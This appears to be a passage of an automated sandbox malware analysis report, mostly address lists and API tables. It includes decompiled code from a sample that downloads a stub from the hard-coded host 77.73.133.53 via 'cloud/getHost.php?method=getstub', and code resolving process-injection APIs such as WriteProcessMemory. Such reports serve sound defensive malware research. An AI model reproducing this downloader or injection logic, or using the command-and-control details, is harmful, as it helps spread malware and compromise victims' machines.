                                                                                                                                      									_v8(_a4, _v12, 0, 0x8000);
                                                                                                                                      									_v8(_a4, _v20, 0, 0x8000);
                                                                                                                                      									return 0;
                                                                                                                                      								}
                                                                                                                                      								_v8(_a4, _v12, 0, 0x8000);
                                                                                                                                      								return 0;
                                                                                                                                      							}
                                                                                                                                      							_v8(_a4, _v12, 0, 0x8000);
                                                                                                                                      							return 0;
                                                                                                                                      						}
                                                                                                                                      						return 0;
                                                                                                                                      					}
                                                                                                                                      					return 0;
                                                                                                                                      				} else {
                                                                                                                                      					return 0;
                                                                                                                                      				}
                                                                                                                                      			}






































                                                                                                                                      0x00e21709
                                                                                                                                      0x00e21710
                                                                                                                                      0x00e21717
                                                                                                                                      0x00e2171e
                                                                                                                                      0x00e21730
                                                                                                                                      0x00e21737
                                                                                                                                      0x00e2174c
                                                                                                                                      0x00e2175e
                                                                                                                                      0x00e21770
                                                                                                                                      0x00e21782
                                                                                                                                      0x00e21794
                                                                                                                                      0x00e217a6
                                                                                                                                      0x00e217b8
                                                                                                                                      0x00e217ca
                                                                                                                                      0x00e217dc
                                                                                                                                      0x00e217dc
                                                                                                                                      0x00e217ee
                                                                                                                                      0x00e21800
                                                                                                                                      0x00e21809
                                                                                                                                      0x00e21812
                                                                                                                                      0x00e21821
                                                                                                                                      0x00e21841
                                                                                                                                      0x00e21848
                                                                                                                                      0x00e21851
                                                                                                                                      0x00e2186d
                                                                                                                                      0x00e21872
                                                                                                                                      0x00e21875
                                                                                                                                      0x00e21878
                                                                                                                                      0x00e2187b
                                                                                                                                      0x00e2187e
                                                                                                                                      0x00e21881
                                                                                                                                      0x00e2188a
                                                                                                                                      0x00e21892
                                                                                                                                      0x00e21898
                                                                                                                                      0x00e2189e
                                                                                                                                      0x00e218a4
                                                                                                                                      0x00e218bf
                                                                                                                                      0x00e218e4
                                                                                                                                      0x00e218e8
                                                                                                                                      0x00e218eb
                                                                                                                                      0x00e21906
                                                                                                                                      0x00e21919
                                                                                                                                      0x00e218fa
                                                                                                                                      0x00e21903
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21943
                                                                                                                                      0x00e21952
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21955
                                                                                                                                      0x00e21919
                                                                                                                                      0x00e21970
                                                                                                                                      0x00e21977
                                                                                                                                      0x00e219a7
                                                                                                                                      0x00e219e9
                                                                                                                                      0x00e219f0
                                                                                                                                      0x00e21a36
                                                                                                                                      0x00e21a89
                                                                                                                                      0x00e21a8f
                                                                                                                                      0x00e21a96
                                                                                                                                      0x00e21ad9
                                                                                                                                      0x00e21adc
                                                                                                                                      0x00e21ae3
                                                                                                                                      0x00e21aed
                                                                                                                                      0x00e21afc
                                                                                                                                      0x00e21b06
                                                                                                                                      0x00e21b11
                                                                                                                                      0x00e21b17
                                                                                                                                      0x00e21b1a
                                                                                                                                      0x00e21b1d
                                                                                                                                      0x00e21b20
                                                                                                                                      0x00e21b23
                                                                                                                                      0x00e21b39
                                                                                                                                      0x00e21b3f
                                                                                                                                      0x00e21b49
                                                                                                                                      0x00e21b87
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21b87
                                                                                                                                      0x00e21b5a
                                                                                                                                      0x00e21b6c
                                                                                                                                      0x00e21b7e
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21b81
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21b08
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21b8f
                                                                                                                                      0x00e21aa7
                                                                                                                                      0x00e21ab9
                                                                                                                                      0x00e21acb
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21ace
                                                                                                                                      0x00e21a47
                                                                                                                                      0x00e21a59
                                                                                                                                      0x00e21a6b
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21a6e
                                                                                                                                      0x00e21a01
                                                                                                                                      0x00e21a13
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21a16
                                                                                                                                      0x00e219b8
                                                                                                                                      0x00e219ca
                                                                                                                                      0x00000000
                                                                                                                                      0x00e219cd
                                                                                                                                      0x00e21988
                                                                                                                                      0x00000000
                                                                                                                                      0x00e2198b
                                                                                                                                      0x00e218d0
                                                                                                                                      0x00000000
                                                                                                                                      0x00e218d3
                                                                                                                                      0x00000000
                                                                                                                                      0x00e2184a
                                                                                                                                      0x00000000
                                                                                                                                      0x00e217f0
                                                                                                                                      0x00000000
                                                                                                                                      0x00e217f0

                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00E2172A
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VirtualAllocEx), ref: 00E21746
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VirtualProtectEx), ref: 00E21758
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 00E2176A
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VirtualFreeEx), ref: 00E2177C
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00E2178E
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetExitCodeProcess), ref: 00E217A0
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReadProcessMemory), ref: 00E217B2
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Sleep), ref: 00E217C4
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FreeLibrary), ref: 00E217D6
                                                                                                                                      • VirtualAllocEx.KERNELBASE(00000000,00000000,?,00003000,00000004), ref: 00E2183E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.505280435.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.505262824.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.505297797.0000000000E22000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.505313351.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_e20000_EgNIXduB6T.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$AllocLibraryLoadVirtual
                                                                                                                                      • String ID: @@@$CloseHandle$FreeLibrary$GetExitCodeProcess$ReadProcessMemory$Sleep$VirtualAllocEx$VirtualFreeEx$VirtualProtectEx$WriteProcessMemory$kernel32.dll
                                                                                                                                      • API String ID: 857568384-290356076
                                                                                                                                      • Opcode ID: a8de0b1e43d946f0a5f399ff371993ee429fef07dd0f4d68c59ac634d3ac7ede
                                                                                                                                      • Instruction ID: 5ad0e87e68d86f9bdaa274507184eefe7c78c7ee6834f5c1ba3979bc993b1b5a
                                                                                                                                      • Opcode Fuzzy Hash: a8de0b1e43d946f0a5f399ff371993ee429fef07dd0f4d68c59ac634d3ac7ede
                                                                                                                                      • Instruction Fuzzy Hash: F3F1C3B5A00218FBDB14CFA4D895FEEBBB5BF48700F209548F605BB280D674AA45DF94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 120 e21000-e2102a WinHttpOpen 121 e21030-e21037 120->121 121->121 122 e21039-e21052 MultiByteToWideChar 121->122 123 e21054-e2105b 122->123 123->123 124 e2105d-e21074 MultiByteToWideChar 123->124 125 e21076-e2108a WinHttpConnect 124->125 126 e2108d-e2109f 124->126 125->126 127 e210a1-e210ae 126->127 127->127 128 e210b0-e210b5 127->128 129 e210b7-e210be 128->129 129->129 130 e210c0-e210d3 MultiByteToWideChar 129->130 131 e210d5-e210dd 130->131 131->131 132 e210df-e210ff MultiByteToWideChar 131->132 133 e21101-e21108 132->133 134 e2110a-e21111 132->134 133->133 133->134 135 e21113-e2111b 134->135 136 e2112f-e21136 134->136 137 e21120-e2112d 135->137 138 e21138-e21156 WinHttpOpenRequest 136->138 139 e2117f-e21181 136->139 137->136 137->137 138->139 141 e21158-e21172 WinHttpSendRequest 138->141 140 e21186-e2118c 139->140 142 e21192-e21199 140->142 143 e212da-e212e2 140->143 144 e21183 141->144 145 e21174-e2117d WinHttpReceiveResponse 141->145 146 e2119b-e211a9 GetSystemInfo 142->146 147 e211ae-e211d2 VirtualAlloc 142->147 144->140 145->140 146->147 148 e211d5-e211e4 WinHttpQueryDataAvailable 147->148 149 e21271-e2127c 148->149 150 e211ea-e211f4 148->150 151 e21281-e21286 149->151 152 e2127e-e2127f WinHttpCloseHandle 149->152 150->149 153 e211f6-e211fb 150->153 154 e2128b-e21290 151->154 155 e21288-e21289 WinHttpCloseHandle 151->155 152->151 156 e21244-e21249 153->156 157 e211fd-e21204 153->157 158 e21292-e21293 WinHttpCloseHandle 154->158 159 e21295-e212a4 154->159 155->154 162 e2124c-e2125d WinHttpReadData 156->162 160 e21206-e21214 GetSystemInfo 157->160 161 e21219-e2123c VirtualAlloc 157->161 158->159 163 e212a6-e212aa 159->163 164 e212ba-e212d1 VirtualFree 159->164 160->161 165 e212d2-e212d5 161->165 166 e21242 161->166 162->149 167 e2125f-e21266 162->167 168 e212b0-e212b8 163->168 165->162 166->156 169 e21268 167->169 170 e21269-e2126b 167->170 168->164 168->168 169->170 170->148 170->149
                                                                                                                                      C-Code - Quality: 31%
                                                                                                                                      			E00E21000(intOrPtr __eax, intOrPtr* _a4, char* _a8) {
                                                                                                                                      				char _v8;
                                                                                                                                      				void* _v12;
                                                                                                                                      				signed int _v16;
                                                                                                                                      				signed int _v20;
                                                                                                                                      				intOrPtr _v24;
                                                                                                                                      				intOrPtr _v28;
                                                                                                                                      				intOrPtr _v32;
                                                                                                                                      				struct _SYSTEM_INFO _v68;
                                                                                                                                      				short _v132;
                                                                                                                                      				char _v644;
                                                                                                                                      				short _v1156;
                                                                                                                                      				void* _t52;
                                                                                                                                      				void* _t55;
                                                                                                                                      				signed int* _t58;
                                                                                                                                      				void* _t59;
                                                                                                                                      				void* _t62;
                                                                                                                                      				signed int* _t65;
                                                                                                                                      				void* _t66;
                                                                                                                                      				signed int _t68;
                                                                                                                                      				void* _t70;
                                                                                                                                      				char* _t73;
                                                                                                                                      				intOrPtr _t74;
                                                                                                                                      				intOrPtr _t75;
                                                                                                                                      				intOrPtr _t76;
                                                                                                                                      				char* _t78;
                                                                                                                                      				int _t79;
                                                                                                                                      				intOrPtr _t86;
                                                                                                                                      				intOrPtr _t87;
                                                                                                                                      				signed int _t88;
                                                                                                                                      				void* _t94;
                                                                                                                                      				short* _t99;
                                                                                                                                      				signed int _t100;
                                                                                                                                      				signed int _t101;
                                                                                                                                      				void* _t102;
                                                                                                                                      				void* _t103;
                                                                                                                                      				int _t104;
                                                                                                                                      				signed int _t106;
                                                                                                                                      				int _t108;
                                                                                                                                      				signed short _t110;
                                                                                                                                      				char _t112;
                                                                                                                                      				char _t113;
                                                                                                                                      				signed int _t114;
                                                                                                                                      				void* _t116;
                                                                                                                                      				void* _t118;
                                                                                                                                      				void* _t121;
                                                                                                                                      				intOrPtr _t122;
                                                                                                                                      				intOrPtr _t124;
                                                                                                                                      				long _t127;
                                                                                                                                      				intOrPtr* _t128;
                                                                                                                                      				void* _t129;
                                                                                                                                      				signed int _t131;
                                                                                                                                      				void* _t132;
                                                                                                                                      
                                                                                                                                      				_t100 = 0;
                                                                                                                                      				_v20 = 0;
                                                                                                                                      				_v16 = 0;
                                                                                                                                      				__imp__WinHttpOpen(L"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36", 0, 0, 0, 0); // executed
                                                                                                                                      				_t122 = __eax;
                                                                                                                                      				_t52 = 0;
                                                                                                                                      				_v32 = __eax;
                                                                                                                                      				asm("o16 nop [eax+eax]");
                                                                                                                                      				goto L1;
                                                                                                                                      				do {
                                                                                                                                      					L3:
                                                                                                                                      					_t55 = _t55 + 1;
                                                                                                                                      				} while ( *((intOrPtr*)(_t55 + "77.73.133.53")) != 0);
                                                                                                                                      				MultiByteToWideChar(0, 0, "77.73.133.53", _t55 + 1,  &_v1156, _t104);
                                                                                                                                      				if(_t122 != 0) {
                                                                                                                                      					_t99 =  &_v1156;
                                                                                                                                      					__imp__WinHttpConnect(_t122, _t99, 0x50, 0);
                                                                                                                                      					_t100 = _t99;
                                                                                                                                      					_v20 = _t99;
                                                                                                                                      				}
                                                                                                                                      				_t58 =  &_v644;
                                                                                                                                      				_t106 = 0x63;
                                                                                                                                      				_t116 = L"cloud/getHost.php?method=getstub&bid=" - _t58;
                                                                                                                                      				do {
                                                                                                                                      					 *_t58 = _t106;
                                                                                                                                      					_t58 =  &(_t58[0]);
                                                                                                                                      					_t106 =  *(_t116 + _t58) & 0x0000ffff;
                                                                                                                                      				} while (_t106 != 0);
                                                                                                                                      				 *_t58 = 0;
                                                                                                                                      				_t59 = 0;
                                                                                                                                      				do {
                                                                                                                                      					_t59 = _t59 + 1;
                                                                                                                                      				} while ( *((intOrPtr*)(_t59 + "1923830098                      ")) != 0);
                                                                                                                                      				_t108 = MultiByteToWideChar(0, 0, "1923830098                      ", _t59 + 1, 0, 0);
                                                                                                                                      				_t62 = 0;
                                                                                                                                      				do {
                                                                                                                                      					_t62 = _t62 + 1;
                                                                                                                                      				} while ( *((char*)(_t62 + "1923830098                      ")) != 0);
                                                                                                                                      				MultiByteToWideChar(0, 0, "1923830098                      ", _t62 + 1,  &_v132, _t108);
                                                                                                                                      				_t65 =  &_v644;
                                                                                                                                      				if(_v644 != 0) {
                                                                                                                                      					do {
                                                                                                                                      						_t65 =  &(_t65[0]);
                                                                                                                                      					} while ( *_t65 != 0);
                                                                                                                                      				}
                                                                                                                                      				_t110 = _v132;
                                                                                                                                      				if(_t110 != 0) {
                                                                                                                                      					_t114 = _t110 & 0x0000ffff;
                                                                                                                                      					_t121 =  &_v132 - _t65;
                                                                                                                                      					do {
                                                                                                                                      						 *_t65 = _t114;
                                                                                                                                      						_t65 =  &(_t65[0]);
                                                                                                                                      						_t114 =  *(_t121 + _t65) & 0x0000ffff;
                                                                                                                                      					} while (_t114 != 0);
                                                                                                                                      				}
                                                                                                                                      				 *_t65 = 0;
                                                                                                                                      				if(_t100 == 0) {
                                                                                                                                      					L21:
                                                                                                                                      					_t66 = 0;
                                                                                                                                      				} else {
                                                                                                                                      					_t66 =  &_v644;
                                                                                                                                      					__imp__WinHttpOpenRequest(_t100, L"GET", _t66, 0, 0, 0, 0); // executed
                                                                                                                                      					_t132 = _t66;
                                                                                                                                      					_v16 = _t132;
                                                                                                                                      					if(_t132 == 0) {
                                                                                                                                      						goto L21;
                                                                                                                                      					} else {
                                                                                                                                      						__imp__WinHttpSendRequest(_t132, 0, 0, 0, 0, 0, 0); // executed
                                                                                                                                      						_t103 = _t66;
                                                                                                                                      						_v12 = _t103;
                                                                                                                                      						if(_t103 == 0) {
                                                                                                                                      							_t66 = _v12;
                                                                                                                                      						} else {
                                                                                                                                      							__imp__WinHttpReceiveResponse(_t132, 0); // executed
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				_t124 = 0;
                                                                                                                                      				_t101 = 0;
                                                                                                                                      				if(_t66 == 0) {
                                                                                                                                      					return 0;
                                                                                                                                      				} else {
                                                                                                                                      					_t68 =  *0xe23000;
                                                                                                                                      					if(_t68 == 0) {
                                                                                                                                      						GetSystemInfo( &_v68); // executed
                                                                                                                                      						_t68 = _v68.dwAllocationGranularity - 1;
                                                                                                                                      						 *0xe23000 = _t68;
                                                                                                                                      					}
                                                                                                                                      					_t127 = _t68 + 0x04000000 &  !_t68;
                                                                                                                                      					_t70 = VirtualAlloc(0, _t127, 0x2000, 4); // executed
                                                                                                                                      					_v12 = _t70;
                                                                                                                                      					_t72 =  !=  ? _t127 : _t101;
                                                                                                                                      					_v24 =  !=  ? _t127 : _t101;
                                                                                                                                      					while(1) {
                                                                                                                                      						_t73 =  &_v8;
                                                                                                                                      						__imp__WinHttpQueryDataAvailable(_v16, _t73); // executed
                                                                                                                                      						if(_t73 == 0) {
                                                                                                                                      							break;
                                                                                                                                      						}
                                                                                                                                      						_t113 = _v8;
                                                                                                                                      						if(_v24 - _t124 >= _t113) {
                                                                                                                                      							_t129 = _t124 + _t113;
                                                                                                                                      							if(_t129 <= _t101) {
                                                                                                                                      								L34:
                                                                                                                                      								_t86 = _v12 + _t124;
                                                                                                                                      								_v28 = _t86;
                                                                                                                                      							} else {
                                                                                                                                      								_t88 =  *0xe23000;
                                                                                                                                      								if(_t88 == 0) {
                                                                                                                                      									GetSystemInfo( &_v68);
                                                                                                                                      									_t88 = _v68.dwAllocationGranularity - 1;
                                                                                                                                      									 *0xe23000 = _t88;
                                                                                                                                      								}
                                                                                                                                      								_t131 = _t129 + _t88 &  !_t88;
                                                                                                                                      								_t94 = VirtualAlloc(_v12 + _t101, _t131 - _t101, 0x1000, 4); // executed
                                                                                                                                      								_t113 = _v8;
                                                                                                                                      								if(_t94 == 0) {
                                                                                                                                      									_t86 = _v28;
                                                                                                                                      								} else {
                                                                                                                                      									_t101 = _t131;
                                                                                                                                      									goto L34;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							__imp__WinHttpReadData(_v16, _t86, _t113,  &_v8);
                                                                                                                                      							if(_t86 != 0) {
                                                                                                                                      								_t87 = _v8;
                                                                                                                                      								_t124 = _t124 + _t87;
                                                                                                                                      								if(_t124 > _t101) {
                                                                                                                                      									asm("int3");
                                                                                                                                      								}
                                                                                                                                      								if(_t87 != 0) {
                                                                                                                                      									continue;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						break;
                                                                                                                                      					}
                                                                                                                                      					_t74 = _v16;
                                                                                                                                      					_t128 = __imp__WinHttpCloseHandle;
                                                                                                                                      					if(_t74 != 0) {
                                                                                                                                      						 *_t128(_t74);
                                                                                                                                      					}
                                                                                                                                      					_t75 = _v20;
                                                                                                                                      					if(_t75 != 0) {
                                                                                                                                      						 *_t128(_t75);
                                                                                                                                      					}
                                                                                                                                      					_t76 = _v32;
                                                                                                                                      					if(_t76 != 0) {
                                                                                                                                      						 *_t128(_t76);
                                                                                                                                      					}
                                                                                                                                      					_t102 = _v12;
                                                                                                                                      					_t112 =  *_t102;
                                                                                                                                      					 *_a4 = _t124;
                                                                                                                                      					_t78 = _a8;
                                                                                                                                      					if(_t112 != 0) {
                                                                                                                                      						_t118 = _t102 - _t78;
                                                                                                                                      						asm("o16 nop [eax+eax]");
                                                                                                                                      						do {
                                                                                                                                      							 *_t78 = _t112;
                                                                                                                                      							_t78 = _t78 + 1;
                                                                                                                                      							_t112 =  *((intOrPtr*)(_t118 + _t78));
                                                                                                                                      						} while (_t112 != 0);
                                                                                                                                      					}
                                                                                                                                      					 *_t78 = 0; // executed
                                                                                                                                      					_t79 = VirtualFree(_t102, 0, 0x8000); // executed
                                                                                                                                      					return _t79;
                                                                                                                                      				}
                                                                                                                                      				L1:
                                                                                                                                      				_t52 = _t52 + 1;
                                                                                                                                      				if( *((intOrPtr*)(_t52 + "77.73.133.53")) != 0) {
                                                                                                                                      					goto L1;
                                                                                                                                      				} else {
                                                                                                                                      					_t104 = MultiByteToWideChar(0, 0, "77.73.133.53", _t52 + 1, 0, 0);
                                                                                                                                      					_t55 = 0;
                                                                                                                                      				}
                                                                                                                                      				goto L3;
                                                                                                                                      			}























































                                                                                                                                      0x00e2100c
                                                                                                                                      0x00e21017
                                                                                                                                      0x00e2101a
                                                                                                                                      0x00e2101d
                                                                                                                                      0x00e21023
                                                                                                                                      0x00e21025
                                                                                                                                      0x00e21027
                                                                                                                                      0x00e2102a
                                                                                                                                      0x00e2102a
                                                                                                                                      0x00e21054
                                                                                                                                      0x00e21054
                                                                                                                                      0x00e21054
                                                                                                                                      0x00e21055
                                                                                                                                      0x00e21070
                                                                                                                                      0x00e21074
                                                                                                                                      0x00e2107a
                                                                                                                                      0x00e21082
                                                                                                                                      0x00e21088
                                                                                                                                      0x00e2108a
                                                                                                                                      0x00e2108a
                                                                                                                                      0x00e2108d
                                                                                                                                      0x00e2109a
                                                                                                                                      0x00e2109f
                                                                                                                                      0x00e210a1
                                                                                                                                      0x00e210a1
                                                                                                                                      0x00e210a4
                                                                                                                                      0x00e210a7
                                                                                                                                      0x00e210ab
                                                                                                                                      0x00e210b2
                                                                                                                                      0x00e210b5
                                                                                                                                      0x00e210b7
                                                                                                                                      0x00e210b7
                                                                                                                                      0x00e210b8
                                                                                                                                      0x00e210d1
                                                                                                                                      0x00e210d3
                                                                                                                                      0x00e210d5
                                                                                                                                      0x00e210d5
                                                                                                                                      0x00e210d6
                                                                                                                                      0x00e210ef
                                                                                                                                      0x00e210f9
                                                                                                                                      0x00e210ff
                                                                                                                                      0x00e21101
                                                                                                                                      0x00e21101
                                                                                                                                      0x00e21104
                                                                                                                                      0x00e21101
                                                                                                                                      0x00e2110a
                                                                                                                                      0x00e21111
                                                                                                                                      0x00e21116
                                                                                                                                      0x00e21119
                                                                                                                                      0x00e21120
                                                                                                                                      0x00e21120
                                                                                                                                      0x00e21123
                                                                                                                                      0x00e21126
                                                                                                                                      0x00e2112a
                                                                                                                                      0x00e21120
                                                                                                                                      0x00e21131
                                                                                                                                      0x00e21136
                                                                                                                                      0x00e2117f
                                                                                                                                      0x00e2117f
                                                                                                                                      0x00e21138
                                                                                                                                      0x00e2113c
                                                                                                                                      0x00e21149
                                                                                                                                      0x00e2114f
                                                                                                                                      0x00e21151
                                                                                                                                      0x00e21156
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21158
                                                                                                                                      0x00e21165
                                                                                                                                      0x00e2116b
                                                                                                                                      0x00e2116d
                                                                                                                                      0x00e21172
                                                                                                                                      0x00e21183
                                                                                                                                      0x00e21174
                                                                                                                                      0x00e21177
                                                                                                                                      0x00e21177
                                                                                                                                      0x00e21172
                                                                                                                                      0x00e21156
                                                                                                                                      0x00e21186
                                                                                                                                      0x00e21188
                                                                                                                                      0x00e2118c
                                                                                                                                      0x00e212e2
                                                                                                                                      0x00e21192
                                                                                                                                      0x00e21192
                                                                                                                                      0x00e21199
                                                                                                                                      0x00e2119f
                                                                                                                                      0x00e211a8
                                                                                                                                      0x00e211a9
                                                                                                                                      0x00e211a9
                                                                                                                                      0x00e211bd
                                                                                                                                      0x00e211c2
                                                                                                                                      0x00e211c8
                                                                                                                                      0x00e211cf
                                                                                                                                      0x00e211d2
                                                                                                                                      0x00e211d5
                                                                                                                                      0x00e211d5
                                                                                                                                      0x00e211dc
                                                                                                                                      0x00e211e4
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00e211ed
                                                                                                                                      0x00e211f4
                                                                                                                                      0x00e211f6
                                                                                                                                      0x00e211fb
                                                                                                                                      0x00e21244
                                                                                                                                      0x00e21247
                                                                                                                                      0x00e21249
                                                                                                                                      0x00e211fd
                                                                                                                                      0x00e211fd
                                                                                                                                      0x00e21204
                                                                                                                                      0x00e2120a
                                                                                                                                      0x00e21213
                                                                                                                                      0x00e21214
                                                                                                                                      0x00e21214
                                                                                                                                      0x00e2121d
                                                                                                                                      0x00e21231
                                                                                                                                      0x00e21237
                                                                                                                                      0x00e2123c
                                                                                                                                      0x00e212d2
                                                                                                                                      0x00e21242
                                                                                                                                      0x00e21242
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21242
                                                                                                                                      0x00e2123c
                                                                                                                                      0x00e21255
                                                                                                                                      0x00e2125d
                                                                                                                                      0x00e2125f
                                                                                                                                      0x00e21262
                                                                                                                                      0x00e21266
                                                                                                                                      0x00e21268
                                                                                                                                      0x00e21268
                                                                                                                                      0x00e2126b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00e2126b
                                                                                                                                      0x00e2125d
                                                                                                                                      0x00000000
                                                                                                                                      0x00e211f4
                                                                                                                                      0x00e21271
                                                                                                                                      0x00e21274
                                                                                                                                      0x00e2127c
                                                                                                                                      0x00e2127f
                                                                                                                                      0x00e2127f
                                                                                                                                      0x00e21281
                                                                                                                                      0x00e21286
                                                                                                                                      0x00e21289
                                                                                                                                      0x00e21289
                                                                                                                                      0x00e2128b
                                                                                                                                      0x00e21290
                                                                                                                                      0x00e21293
                                                                                                                                      0x00e21293
                                                                                                                                      0x00e21295
                                                                                                                                      0x00e2129b
                                                                                                                                      0x00e2129d
                                                                                                                                      0x00e2129f
                                                                                                                                      0x00e212a4
                                                                                                                                      0x00e212a8
                                                                                                                                      0x00e212aa
                                                                                                                                      0x00e212b0
                                                                                                                                      0x00e212b0
                                                                                                                                      0x00e212b2
                                                                                                                                      0x00e212b3
                                                                                                                                      0x00e212b6
                                                                                                                                      0x00e212b0
                                                                                                                                      0x00e212c2
                                                                                                                                      0x00e212c5
                                                                                                                                      0x00e212d1
                                                                                                                                      0x00e212d1
                                                                                                                                      0x00e21030
                                                                                                                                      0x00e21030
                                                                                                                                      0x00e21037
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21039
                                                                                                                                      0x00e21050
                                                                                                                                      0x00e21052
                                                                                                                                      0x00e21052
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      • WinHttpOpen.WINHTTP(Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00E2101D
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,77.73.133.53,00000002,00000000,00000000), ref: 00E2104E
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,77.73.133.53,00000002,?,00000000), ref: 00E21070
                                                                                                                                      • WinHttpConnect.WINHTTP(00000000,?,00000050,00000000), ref: 00E21082
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,1923830098 ,00000002,00000000,00000000), ref: 00E210CF
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,1923830098 ,00000002,?,00000000), ref: 00E210EF
                                                                                                                                      • WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00000000), ref: 00E21149
                                                                                                                                      • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E21165
                                                                                                                                      • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00E21177
                                                                                                                                      • GetSystemInfo.KERNELBASE(?), ref: 00E2119F
                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00002000,00000004), ref: 00E211C2
                                                                                                                                      • WinHttpQueryDataAvailable.WINHTTP(?,?), ref: 00E211DC
                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 00E2120A
                                                                                                                                      • VirtualAlloc.KERNELBASE(?,?,00001000,00000004), ref: 00E21231
                                                                                                                                      • WinHttpReadData.WINHTTP(?,?,?,?), ref: 00E21255
                                                                                                                                      • WinHttpCloseHandle.WINHTTP(?), ref: 00E2127F
                                                                                                                                      • WinHttpCloseHandle.WINHTTP(?), ref: 00E21289
                                                                                                                                      • WinHttpCloseHandle.WINHTTP(?), ref: 00E21293
                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00E212C5
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.505280435.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.505262824.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.505297797.0000000000E22000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.505313351.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_e20000_EgNIXduB6T.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Http$ByteCharMultiWide$CloseHandleVirtual$AllocDataInfoOpenRequestSystem$AvailableConnectFreeQueryReadReceiveResponseSend
                                                                                                                                      • String ID: 1923830098 $77.73.133.53$GET$Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36$cloud/getHost.php?method=getstub&bid=
                                                                                                                                      • API String ID: 1521347283-1965086633
                                                                                                                                      • Opcode ID: b48796000e0451c9229f83e4766ed896836cdfa3f9a4490b9a9a568df35c7a11
                                                                                                                                      • Instruction ID: 69d912532970b98b5e01c0556a994ed7068242d3630fc09e31a8db3071d01ae4
                                                                                                                                      • Opcode Fuzzy Hash: b48796000e0451c9229f83e4766ed896836cdfa3f9a4490b9a9a568df35c7a11
                                                                                                                                      • Instruction Fuzzy Hash: 62919371A01228AFEB208F65DC85FBA77F8EF14744F1551A9FA05F7290E6709E05CB60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0613E946: RtlFreeHeap.NTDLL(00000000,00000000,?,06148A53,?,00000000,?,?,06148CF4,?,00000007,?,?,06148186,?,?), ref: 0613E95C
                                                                                                                                        • Part of subcall function 0613E946: GetLastError.KERNEL32(?,?,06148A53,?,00000000,?,?,06148CF4,?,00000007,?,?,06148186,?,?), ref: 0613E967
                                                                                                                                      • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,061413CC,00000000,00000000,00000000), ref: 0614128B
